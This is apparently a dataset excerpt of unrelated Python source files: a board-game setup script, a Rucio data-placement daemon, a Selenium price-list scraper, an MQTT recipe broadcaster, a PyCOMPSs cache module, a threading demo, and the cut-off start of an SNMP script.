source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
gaia_project.py
|
import os
import random
import sys
from threading import Thread
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
from PIL import Image
import constants as C
from automa import Automa
from federation import FederationToken
from player import Player
from research import Research
from scoring import Scoring
from universe import Universe
ROOT = os.path.dirname(__file__)
IMAGES = os.path.join(ROOT, "images")
class GaiaProject:
"""Class for combining all the different parts of the game."""
def __init__(self, player_count, screen, automa=False):
"""Create a new game of GaiaProject
Args:
player_count (int): Amount of players.
automa (bool): whether or not the player is playing against the
automa.
"""
self.player_count = player_count
self.screen = screen # Pygame Universe representation.
self.automa = automa
self.players = [] # A list with all the player objects in turn order.
self.board_setup()
def board_setup(self):
"""Setup all the pieces of the game."""
if self.automa:
amount = 2
else:
amount = 3
self.federation_tokens = [
FederationToken("FEDvps.png", amount, "vp12", "grey"),
FederationToken("FEDqic.png", amount, ["vp8", "qic1"], "green"),
FederationToken("FEDore.png", amount, ["vp7", "ore2"], "green"),
FederationToken(
"FEDcre.png", amount, ["vp7", "credits6"], "green"
),
FederationToken(
"FEDknw.png", amount, ["vp6", "knowledge2"], "green"
)
]
self.research_board = Research()
self.scoring_board = Scoring()
# Order of setup according to rules:
# 1. Choose first player (Against the automa, the human goes first).
# 2. Let the last player assemble the game board (or just some final
# rotation of tiles) or just do it together.
self.create_universe()
# 3. Randomly place the standard and advanced technology tiles.
self.research_board.randomise_tech_tiles()
# 4. Randomly select one federation token for the terraforming research
# track (Against the automa each type of token only has 2 pieces).
terraforming_fed_token = random.choice(self.federation_tokens)
terraforming_fed_token.count -= 1
self.research_board.terraforming.level5.reward = terraforming_fed_token
# 5. Randomly place 6 round scoring and 2 final scoring tiles on the
# scoring board.
self.scoring_board.randomise_scoring()
# 6. Randomly select {amount of players} + 3 booster tiles.
self.scoring_board.randomise_boosters(self.player_count)
# TESTING uncomment line below when finished. Commented because
# it kept changing the img file which is not necessary right now.
# Load the setup into an image to see it more easily as a human.
self.visual_setup()
def visual_setup(self):
"""Visualize the board setup.
Load setup into an image for better human readability.
"""
# Canvas with technology track backgrounds at the top.
with Image.open(os.path.join(ROOT,
"empty_setup.png")) as canvas:
# Terraforming setup.
# Placing the federation token.
with Image.open(os.path.join(IMAGES,
self.research_board.terraforming.level5.reward.img)) as fed:
canvas.paste(fed, (5, 35), fed)
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.terraforming.advanced.img)) as adv:
canvas.paste(adv, (160, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.terraforming.standard.img)) as std:
canvas.paste(std, (158, 127), std)
# Navigation setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.navigation.advanced.img)) as adv:
canvas.paste(adv, (330, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.navigation.standard.img)) as std:
canvas.paste(std, (328, 127), std)
# Artificial Intelligence setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.a_i.advanced.img)) as adv:
canvas.paste(adv, (500, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.a_i.standard.img)) as std:
canvas.paste(std, (496, 127), std)
# Gaia Project setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.gaia_project.advanced.img)) as adv:
canvas.paste(adv, (668, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.gaia_project.standard.img)) as std:
canvas.paste(std, (664, 127), std)
# Economy setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.economy.advanced.img)) as adv:
canvas.paste(adv, (836, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.economy.standard.img)) as std:
canvas.paste(std, (832, 127), std)
# Science setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.science.advanced.img)) as adv:
canvas.paste(adv, (1012, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so i can ignore this.
# pylint: disable=no-member
self.research_board.science.standard.img)) as std:
canvas.paste(std, (1008, 127), std)
# Free standard technology tiles setup.
x = 240
for free_tile in self.research_board.free_standard_technology:
with Image.open(os.path.join(IMAGES,
free_tile.img)) as free_std:
canvas.paste(free_std, (int(x), 260), free_std)
# To space the free tiles evenly apart
x += 240 * 1.4
# Booster tiles setup.
x = 30
for booster_tile in self.scoring_board.boosters:
with Image.open(os.path.join(IMAGES,
booster_tile.img)) as booster:
canvas.paste(booster, (int(x), 415), booster)
# To space the booster tiles evenly apart
x += 80 * 2.5
# Round scoring tiles setup.
x = 5
for round_tile in self.scoring_board.rounds:
with Image.open(os.path.join(IMAGES,
round_tile.img)) as round_:
canvas.paste(round_, (int(x), 745), round_)
# To space the round scoring tiles evenly apart
x += 100 * 1.6
# End scoring tiles setup.
y = 656
for end_tile in self.scoring_board.end_scoring:
with Image.open(os.path.join(IMAGES,
end_tile.img)) as end:
canvas.paste(end, (974, y), end)
# To space the end scoring tiles evenly apart
y += 140
canvas.save("Setup.png", "png")
def create_universe(self):
"""Function for setting up the universe
TODO:
In the future randomise the universe.
"""
self.universe = Universe(self.screen)
def player_setup(self):
"""Initialise Player objects."""
# TODO more players ask for factions here or assign randomly.
# Choose faction (start with first player and going clockwise).
# See Faction.select_faction for available factions for human and
# Automa.select_faction for available factions for the Automa.
self.players.append(Player("Hadsch Halla"))
# If playing against the Automa, ask for the desired difficulty.
if self.automa:
print(
"What difficulty do you want to set the Automa to? Please type"
" the corresponding number."
)
for i, diff in enumerate(C.DIFFICULTY, start=1):
print(f"{i}. {diff}.")
while True:
choice = input("--> ")
if choice in [str(num + 1) for num in range(i)]:
chosen_difficulty = C.DIFFICULTY[int(choice) - 1]
break
else:
print("! Please only type one of the available numbers.")
continue
# Set desired difficulty.
self.players.append(Automa("Taklons", chosen_difficulty))
# Place players on level 0 of all researc7h boards and check if they
# start on level 1 of any of them. Add the Level object to the Player
# object for easy acces and insert the faction name of the player in
# the Level.players list.
for p in self.players:
name = p.faction.name
p.terraforming = self.research_board.terraforming.level0
self.research_board.terraforming.level0.players.append(name)
p.navigation = self.research_board.navigation.level0
self.research_board.navigation.level0.players.append(name)
p.a_i = self.research_board.a_i.level0
self.research_board.a_i.level0.players.append(name)
p.gaia_project = self.research_board.gaia_project.level0
self.research_board.gaia_project.level0.players.append(name)
p.economy = self.research_board.economy.level0
self.research_board.economy.level0.players.append(name)
p.science = self.research_board.science.level0
self.research_board.science.level0.players.append(name)
start_research = p.faction.start_research
if start_research:
levels = [
p.terraforming,
p.navigation,
p.a_i,
p.gaia_project,
p.economy,
p.science,
]
for i, track in enumerate(self.research_board.tech_tracks):
if track.name == start_research:
current_level = levels[i]
track.research(current_level, p, i)
# Place first structures (start with first player and going clockwise):
for player in self.players:
player.start_mine("first", self, self.players)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
for player in reversed(self.players):
player.start_mine("second", self, self.players)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
# Choose booster (start with last player and going counter-clockwise):
print("\nBooster selection.")
for player in reversed(self.players):
player.choose_booster(self.scoring_board)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
def play(self):
"""This function will setup and allow you to start playing a game."""
# During 6 rounds, cycle through the 4 phases of the game.
for rnd in self.scoring_board.rounds:
print(f"\nCurrent round {str(rnd).upper()}.")
self.passed = 0
# 1. Income phase followed by # 2. Gaia phase.
for player in self.players:
player.income_phase()
player.gaia_phase(self)
# 3. Action phase
while self.passed != len(self.players):
for player in self.players:
if not player.passed:
player.action_phase(self, rnd)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
# 4. Clean up phase
# Reset Power/Q.I.C. actions.
for x in range(1, 11):
self.research_board.pq_actions[x] = True
# Reset all players special actions and set passed to false.
for player in self.players:
player.clean_up()
player.passed = False
else:
# End game scoring.
self.scoring_board.end_game_scoring(self)
def start_game(screen):
print("Gaia Project started.\n")
while True:
# TODO more players ask for amount of players here and if you'll
# play against the automa.
player_count = 2
automa = True
new_game = GaiaProject(player_count, screen, automa=automa)
# Choose factions after the whole setup has been done.
print("The board has been set up. Please choose your factions.")
new_game.player_setup()
print("Factions have been chosen. The game will now start. Good luck.")
new_game.play()
# Pause the program to let the player recap a bit about the results.
input("Type enter if you are done playing the game.\n")
break
if __name__ == "__main__":
# TODO for testing only
# Open everything i need for testing the game.
def open_stuff():
# Gaia Project folder
os.startfile(
r"C:\Users\Gebruiker\Desktop\Programming\My Projects\Gaia Project"
)
# Rules
os.startfile("Gaia Project Rules - EN.pdf")
os.startfile("Gaia Project Automa Rules - EN.pdf")
# 2p map
os.startfile("default_2p_map.png")
# Research board
os.startfile("research_board.png")
# Visual Setup
os.startfile("Setup.png")
# Uncomment if files are opened.
# open_stuff()
# Start game
pygame.init()
size = (978, 1000)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Gaia Project Universe")
CLOCK = pygame.time.Clock()
game = Thread(target=start_game, args=(screen,), daemon=True)
game.start()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
pygame.display.update()
CLOCK.tick(2)
|
c3po.py
|
# Copyright 2015-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Thomas Beermann <thomas.beermann@cern.ch>, 2015-2017
# - Vincent Garonne <vgaronne@gmail.com>, 2017-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
#
# PY3K COMPATIBLE
'''
Dynamic data placement daemon.
'''
import logging
from datetime import datetime
from hashlib import md5
from json import dumps
try:
from Queue import Queue
except ImportError:
from queue import Queue
from six import string_types
from sys import stdout
from time import sleep
from threading import Event, Thread
from uuid import uuid4
from requests import post
from requests.auth import HTTPBasicAuth
from requests.exceptions import RequestException
from rucio.client import Client
from rucio.common.config import config_get, config_get_options
from rucio.common.exception import RucioException
from rucio.common.types import InternalScope
from rucio.daemons.c3po.collectors.free_space import FreeSpaceCollector
from rucio.daemons.c3po.collectors.jedi_did import JediDIDCollector
from rucio.daemons.c3po.collectors.workload import WorkloadCollector
logging.basicConfig(stream=stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = Event()
def read_free_space(once=False, thread=0, waiting_time=1800):
"""
Thread to collect the space usage information for RSEs.
"""
free_space_collector = FreeSpaceCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('collecting free space')
free_space_collector.collect_free_space()
timer = 0
def read_workload(once=False, thread=0, waiting_time=1800):
"""
Thread to collect the workload information from PanDA.
"""
workload_collector = WorkloadCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('collecting workload')
workload_collector.collect_workload()
timer = 0
def print_workload(once=False, thread=0, waiting_time=600):
"""
Thread to regularly output the workload to logs for debugging.
"""
workload_collector = WorkloadCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('Number of sites cached %d' % len(workload_collector.get_sites()))
for site in workload_collector.get_sites():
logging.info('%s: %d / %d / %d' % (site, workload_collector.get_cur_jobs(site), workload_collector.get_avg_jobs(site), workload_collector.get_max_jobs(site)))
timer = 0
def read_dids(once=False, thread=0, did_collector=None, waiting_time=60):
"""
Thread to collect DIDs for the placement algorithm.
"""
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
did_collector.get_dids()
timer = 0
def add_rule(client, did, src_rse, dst_rse):
logging.debug('add rule for %s from %s to %s' % (did, src_rse, dst_rse))
r = client.add_replication_rule([did, ], 1, dst_rse, lifetime=604800, account='c3po', source_replica_expression=src_rse, activity='Data Brokering', asynchronous=True)
logging.debug(r)
def place_replica(once=False,
thread=0,
did_queue=None,
waiting_time=100,
dry_run=False,
sampling=False,
algorithms='t2_free_space_only_pop_with_network',
datatypes='NTUP,DAOD',
dest_rse_expr='type=DATADISK',
max_bytes_hour=100000000000000,
max_files_hour=100000,
max_bytes_hour_rse=50000000000000,
max_files_hour_rse=10000,
min_popularity=8,
min_recent_requests=5,
max_replicas=5):
"""
Thread to run the placement algorithm to decide if and where to put new replicas.
"""
try:
c3po_options = config_get_options('c3po')
client = None
if 'algorithms' in c3po_options:
algorithms = config_get('c3po', 'algorithms')
algorithms = algorithms.split(',')
if not dry_run:
if len(algorithms) != 1:
logging.error('Multiple algorithms are only allowed in dry_run mode')
return
client = Client(auth_type='x509_proxy', account='c3po', creds={'client_proxy': '/opt/rucio/etc/ddmadmin.long.proxy'})
vo = client.vo
instances = {}
for algorithm in algorithms:
module_path = 'rucio.daemons.c3po.algorithms.' + algorithm
module = __import__(module_path, globals(), locals(), ['PlacementAlgorithm'])
instance = module.PlacementAlgorithm(datatypes, dest_rse_expr, max_bytes_hour, max_files_hour, max_bytes_hour_rse, max_files_hour_rse, min_popularity, min_recent_requests, max_replicas)
instances[algorithm] = instance
params = {
'dry_run': dry_run,
'sampling': sampling,
'datatypes': datatypes,
'dest_rse_expr': dest_rse_expr,
'max_bytes_hour': max_bytes_hour,
'max_files_hour': max_files_hour,
'max_bytes_hour_rse': max_bytes_hour_rse,
'max_files_hour_rse': max_files_hour_rse,
'min_recent_requests': min_recent_requests,
'min_popularity': min_popularity
}
instance_id = str(uuid4()).split('-')[0]
elastic_url = config_get('c3po', 'elastic_url')
elastic_index = config_get('c3po', 'elastic_index')
ca_cert = False
if 'ca_cert' in c3po_options:
ca_cert = config_get('c3po', 'ca_cert')
auth = False
if ('elastic_user' in c3po_options) and ('elastic_pass' in c3po_options):
auth = HTTPBasicAuth(config_get('c3po', 'elastic_user'), config_get('c3po', 'elastic_pass'))
w = waiting_time
while not GRACEFUL_STOP.is_set():
if w < waiting_time:
w += 10
sleep(10)
continue
len_dids = did_queue.qsize()
if len_dids > 0:
logging.debug('(%s) %d did(s) in queue' % (instance_id, len_dids))
else:
logging.debug('(%s) no dids in queue' % (instance_id))
for _ in range(0, len_dids):
did = did_queue.get()
if isinstance(did[0], string_types):
did[0] = InternalScope(did[0], vo=vo)
for algorithm, instance in instances.items():
logging.info('(%s:%s) Retrieved %s:%s from queue. Run placement algorithm' % (algorithm, instance_id, did[0], did[1]))
decision = instance.place(did)
decision['@timestamp'] = datetime.utcnow().isoformat()
decision['algorithm'] = algorithm
decision['instance_id'] = instance_id
decision['params'] = params
create_rule = True
if sampling and 'error_reason' not in decision:
create_rule = bool(ord(md5(decision['did']).hexdigest()[-1]) & 1)
decision['create_rule'] = create_rule
# write the output to ES for further analysis
index_url = elastic_url + '/' + elastic_index + '-' + datetime.utcnow().strftime('%Y-%m') + '/record/'
try:
if ca_cert:
r = post(index_url, data=dumps(decision), verify=ca_cert, auth=auth)
else:
r = post(index_url, data=dumps(decision))
if r.status_code != 201:
logging.error(r)
logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
except RequestException as e:
logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
logging.error(e)
continue
logging.debug(decision)
if 'error_reason' in decision:
logging.error('(%s:%s) The placement algorithm ran into an error: %s' % (algorithm, instance_id, decision['error_reason']))
continue
logging.info('(%s:%s) Decided to place a new replica for %s on %s' % (algorithm, instance_id, decision['did'], decision['destination_rse']))
if (not dry_run) and create_rule:
# DO IT!
try:
add_rule(client, {'scope': did[0].external, 'name': did[1]}, decision.get('source_rse'), decision.get('destination_rse'))
except RucioException as e:
logging.debug(e)
w = 0
except Exception as e:
logging.critical(e)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(once=False,
threads=1,
only_workload=False,
dry_run=False,
sampling=False,
algorithms='t2_free_space_only_pop_with_network',
datatypes='NTUP,DAOD',
dest_rse_expr='type=DATADISK',
max_bytes_hour=100000000000000,
max_files_hour=100000,
max_bytes_hour_rse=50000000000000,
max_files_hour_rse=10000,
min_popularity=8,
min_recent_requests=5,
max_replicas=5):
"""
Starts up the main thread
"""
logging.info('activating C-3PO')
thread_list = []
try:
if only_workload:
logging.info('running in workload-collector-only mode')
thread_list.append(Thread(target=read_workload, name='read_workload', kwargs={'thread': 0, 'waiting_time': 1800}))
thread_list.append(Thread(target=print_workload, name='print_workload', kwargs={'thread': 0, 'waiting_time': 600}))
else:
logging.info('running in placement mode')
did_queue = Queue()
dc = JediDIDCollector(did_queue)
thread_list.append(Thread(target=read_free_space, name='read_free_space', kwargs={'thread': 0, 'waiting_time': 1800}))
thread_list.append(Thread(target=read_dids, name='read_dids', kwargs={'thread': 0, 'did_collector': dc}))
thread_list.append(Thread(target=place_replica, name='place_replica', kwargs={'thread': 0,
'did_queue': did_queue,
'waiting_time': 10,
'algorithms': algorithms,
'dry_run': dry_run,
'sampling': sampling,
'datatypes': datatypes,
'dest_rse_expr': dest_rse_expr,
'max_bytes_hour': max_bytes_hour,
'max_files_hour': max_files_hour,
'max_bytes_hour_rse': max_bytes_hour_rse,
'max_files_hour_rse': max_files_hour_rse,
'min_popularity': min_popularity,
'min_recent_requests': min_recent_requests,
'max_replicas': max_replicas}))
for t in thread_list:
t.start()
logging.info('waiting for interrupts')
while len(thread_list) > 0:
[t.join(timeout=3) for t in thread_list if t and t.isAlive()]
except Exception as exception:
logging.critical(exception)
|
browser.py
|
'''
Copyright (c) 2019 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from random import choice
from threading import Thread
from selenium import webdriver
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
import webbrowser
from time import sleep
import json
import shutil
import re
import sys
import os
class BrowserServer(SimpleHTTPRequestHandler):
'''here we subclass SimpleHTTPServer to capture error messages
'''
def log_message(self, format, *args):
'''log to standard error with a date time string,
and then call any subclass specific logging functions
'''
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
# Workaround for error trying to GET html
if not re.search("div",format%args) and not re.search("function",format%args):
if re.search("404",format%args):
raise IOError(format%args)
def log_error(self, format, *args):
'''log_error
catch errors in the log_messages instead
'''
pass
class BrowserRobot(object):
''' bring up a server with a custom robot
Defaults
==========
pause_time: time to wait between browser commands
port: a random choice between 8000 and 9999
'''
def __init__(self, **kwargs):
self.Handler = BrowserServer
if "port" in kwargs:
self.port = kwargs['port']
else:
self.port = choice(range(8000,9999))
print('Selected port is %s' %self.port)
self.httpd = TCPServer(("", self.port), self.Handler)
self.server = Thread(target=self.httpd.serve_forever)
self.server.setDaemon(True)
self.server.start()
self.started = True
self.pause_time = 100
self.browser = None
self.headless = False
self.display = None
self.driver = "Chrome"
if "browser" in kwargs:
self.driver = kwargs['browser']
def get_and_wait(self, url, sleep_seconds=0):
'''a helper function to get a browser and wait a randomly
selected number of seconds between 0 and 2'''
self.get_browser()
wait_time = choice([0, 0.25, 0.5, 0.75, 1, 1.5, 2])
self.browser.implicitly_wait(wait_time) # if error, will wait 3 seconds and retry
self.browser.set_page_load_timeout(10)
self.get_page(url)
sleep(sleep_seconds)
def get_browser(self, name=None):
'''get_browser
return a browser if it hasn't been initialized yet
'''
if name is None:
name=self.driver
log_path = "%s-driver.log" % name.lower()
if self.browser is None:
options = self.get_options()
if name.lower() == "Firefox":
self.browser = webdriver.Firefox(service_log_path=log_path)
else:
self.browser = webdriver.Chrome(service_log_path=log_path,
options=options)
return self.browser
def get_options(self, width=1200, height=800):
'''return options for headless, no-sandbox, and custom width/height
'''
options = webdriver.ChromeOptions()
options.add_argument("headless")
options.add_argument("no-sandbox")
options.add_argument("window-size=%sx%s" %(width, height))
return options
def get_page(self, url, name='Chrome'):
'''get_page
open a particular url, checking for Timeout
'''
if self.browser is None:
self.browser = self.get_browser(name)
try:
return self.browser.get(url)
except TimeoutException:
print('Browser request timeout. Are you connected to the internet?')
self.browser.close()
sys.exit(1)
def stop(self):
'''close any running browser or server, and shut down the robot
'''
if self.browser is not None:
self.browser.close()
self.httpd.server_close()
if self.display is not None:
self.display.close()
def run_javascript(browser,code):
if self.browser is not None:
return browser.execute_script(code)
class ScraperRobot(BrowserRobot):
def __str__(self):
return "[browser-robot]"
def __repr__(self):
return "[browser-robot]"
def get_download_urls(self, url):
'''download paginated charge sheets
Parameters
==========
uri: the Docker Hub uri to parse.
'''
self.get_and_wait(url)
prefix = "https://core.secure.ehc.com/src/util/detail-price-list"
links = []
for form_id in ["drg-file-name", "cm-file-name"]:
javascript = "return document.getElementById('%s');" % form_id
result = self.browser.execute_script(javascript)
filename = result.get_attribute('value')
link = "%s/%s" %(prefix, filename)
links.append(link)
return links
|
recipes_broadcast.py
|
"""
Sends every X seconds a list of recipes.
"""
import threading
import time
import common.mqtt_messages as mqtt_messages
import common.mqtt_connection as mqtt_connection
import common.mqtt_topics as mqtt_topics
import server.database as database
_RECIPES_SECONDS_DELAY = 5
def _recipes_sender():
"""
Sends a signal every _RECPIES_SECONDS_DELAY
"""
while True:
recipes = [i for i in database.get_recipes().find()]
for i in recipes:
del i['_id']
recipes_book = mqtt_messages.build_recipes_book_from_dict({"recipes": recipes})
mqtt_connection.publish(mqtt_topics.AVAILABLE_RECIPES, recipes_book)
time.sleep(_RECIPES_SECONDS_DELAY)
def start_recipes_broadcast():
"""
Starts a thread handling the broadcast.
"""
threading.Thread(target=_recipes_sender).start()
|
setup.py
|
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Cache setup
====================
This file contains the cache setup and instantiation.
IMPORTANT: Only used with python >= 3.8.
"""
from multiprocessing import Process
from multiprocessing import Queue
from pycompss.worker.piper.cache.tracker import CacheTrackerConf
from pycompss.worker.piper.cache.tracker import cache_tracker
from pycompss.worker.piper.cache.tracker import start_shared_memory_manager as __start_smm__ # noqa: E501
from pycompss.worker.piper.cache.tracker import stop_shared_memory_manager as __stop_smm__ # noqa: E501
def is_cache_enabled(cache_config):
# type: (str) -> bool
""" Check if the cache is enabled.
:param cache_config: Cache configuration defined on startup.
:return: True if enabled, False otherwise. And size if enabled.
"""
if ":" in cache_config:
cache, _ = cache_config.split(":")
cache = True if cache.lower() == "true" else False
else:
cache = True if cache_config.lower() == "true" else False
return cache
def start_cache(logger, cache_config):
# type: (..., str) -> (..., Process, Queue, dict)
""" Setup the cache process which keeps the consistency of the cache.
:param logger: Logger.
:param cache_config: Cache configuration defined on startup.
:return: Shared memory manager, cache process, cache message queue and
cache ids dictionary
"""
cache_size = __get_cache_size__(cache_config)
# Cache can be used
# Create a proxy dictionary to share the information across workers
# within the same node
from multiprocessing import Manager
manager = Manager()
cache_ids = manager.dict() # Proxy dictionary
# Start a new process to manage the cache contents.
smm = __start_smm__()
conf = CacheTrackerConf(logger, cache_size, None, cache_ids)
cache_process, cache_queue = __create_cache_tracker_process__("cache_tracker", conf) # noqa: E501
return smm, cache_process, cache_queue, cache_ids
def stop_cache(shared_memory_manager, cache_queue, cache_process):
# type: (..., Queue, Process) -> None
""" Stops the cache process and performs the necessary cleanup.
:param shared_memory_manager: Shared memory manager.
:param cache_queue: Cache messaging queue.
:param cache_process: Cache process
:return: None
"""
__destroy_cache_tracker_process__(cache_process, cache_queue)
__stop_smm__(shared_memory_manager)
def __get_cache_size__(cache_config):
# type: (str) -> int
""" Retrieve the cache size for the given config.
:param cache_config: Cache configuration defined on startup.
:return: The cache size
"""
if ":" in cache_config:
_, cache_size = cache_config.split(":")
cache_size = int(cache_size)
else:
cache_size = __get_default_cache_size__()
return cache_size
def __get_default_cache_size__():
# type: () -> int
""" Returns the default cache size.
:return: The size in bytes.
"""
# Default cache_size (bytes) = total_memory (bytes) / 4
mem_info = dict((i.split()[0].rstrip(':'), int(i.split()[1]))
for i in open('/proc/meminfo').readlines())
cache_size = int(mem_info["MemTotal"] * 1024 / 4)
return cache_size
def __create_cache_tracker_process__(process_name, conf):
# type: (str, CacheTrackerConf) -> (Process, Queue)
""" Starts a new cache tracker process.
:param process_name: Process name.
:param conf: cache config.
:return: None
"""
queue = Queue()
process = Process(target=cache_tracker, args=(queue, process_name, conf))
process.start()
return process, queue
def __destroy_cache_tracker_process__(cache_process, cache_queue):
# type: (Process, Queue) -> None
""" Stops the given cache tracker process.
:param cache_process: Cache process
:param cache_queue: Cache messaging queue.
:return: None
"""
cache_queue.put("QUIT") # noqa
cache_process.join() # noqa
cache_queue.close() # noqa
cache_queue.join_thread() # noqa
|
producer_consumer.py
|
# coding: utf-8
import threading
from datetime import datetime
from time import sleep
MESSAGE_CACHE = []
def log(msg):
print('[' + str(datetime.now().second) + ']' + msg)
class Producer(threading.Thread):
def __init__(self, event, message_count=100):
super(Producer, self).__init__()
self.producer_event = threading.Event()
self.producer_event.clear()
self.consumer_event = event
self.message_count = message_count
self.interval = 1
self.cache = []
self.complete = False
def run(self):
produce_thread = threading.Thread(target=self._produce)
produce_thread.start()
send_thread = threading.Thread(target=self._send)
send_thread.start()
produce_thread.join()
send_thread.join()
def _produce(self):
count = 1
while count <= self.message_count:
log('Produce message--->%s.' % count)
self.cache.append(count)
# 通知发送线程已生产
self.producer_event.set()
sleep(self.interval)
count += 1
self.complete = True
def _send(self):
log('Start to send message.')
while True:
if len(MESSAGE_CACHE) >= 5:
# 当消息池满时等待消费者消费
print('Message cache is full, wait for consuming.')
self.consumer_event.clear()
self.consumer_event.wait()
else:
while len(MESSAGE_CACHE) < 5:
if self.cache:
msg = self.cache.pop(0)
log('Send message--->%s.' % msg)
MESSAGE_CACHE.append(msg)
log('Message cache is: %s, cache is: %s after sending '
'message.' % (MESSAGE_CACHE, self.cache))
else:
if self.complete:
log('Complete to produce message.')
return
else:
log('No message to send.')
# 等待下一个生产者消息
self.producer_event.clear()
self.producer_event.wait()
class Consumer(threading.Thread):
def __init__(self, consume_event=None):
super(Consumer, self).__init__()
self.consume_event = consume_event
# 消息间隔2秒
self.interval = 2
# 消费消息时间5秒
self.consume_time = 5
# 等待10秒无消息则退出
self.timeout = 10
def run(self):
wait = 0
while True:
log('Start to consume message.')
if MESSAGE_CACHE:
msg = MESSAGE_CACHE.pop(0)
log('Consume message--->%s.' % msg)
log('Message cache is: %s after consuming '
'message.' % MESSAGE_CACHE)
sleep(self.consume_time)
wait = 0
# 通知生产者生产
self.consume_event.set()
else:
log('Message cache is empty, just wait.')
if wait >= self.timeout:
log('Wait %s no message, exit.' % self.timeout)
break
else:
sleep(self.interval)
wait += self.interval
def main():
event = threading.Event()
producer = Producer(event)
producer.start()
for _ in range(2):
Consumer(event).start()
producer.join()
if __name__ == '__main__':
main()
|
snmp_ifTable.py
|
#!/usr/bin/python
import logging
logging.basicConfig(level=logging.ERROR)
import os
import time
import datetime
import subprocess
import threading
import Queue
# own modules
import tilak_centreon
def get_snmp_table(hostname, table_oid, community, index=False):
"""
hostname : <str>
table_oid : <str>
community : <str>
index : <bool> append index to every row, snmptable Option -Ci
call snmptable command and get output
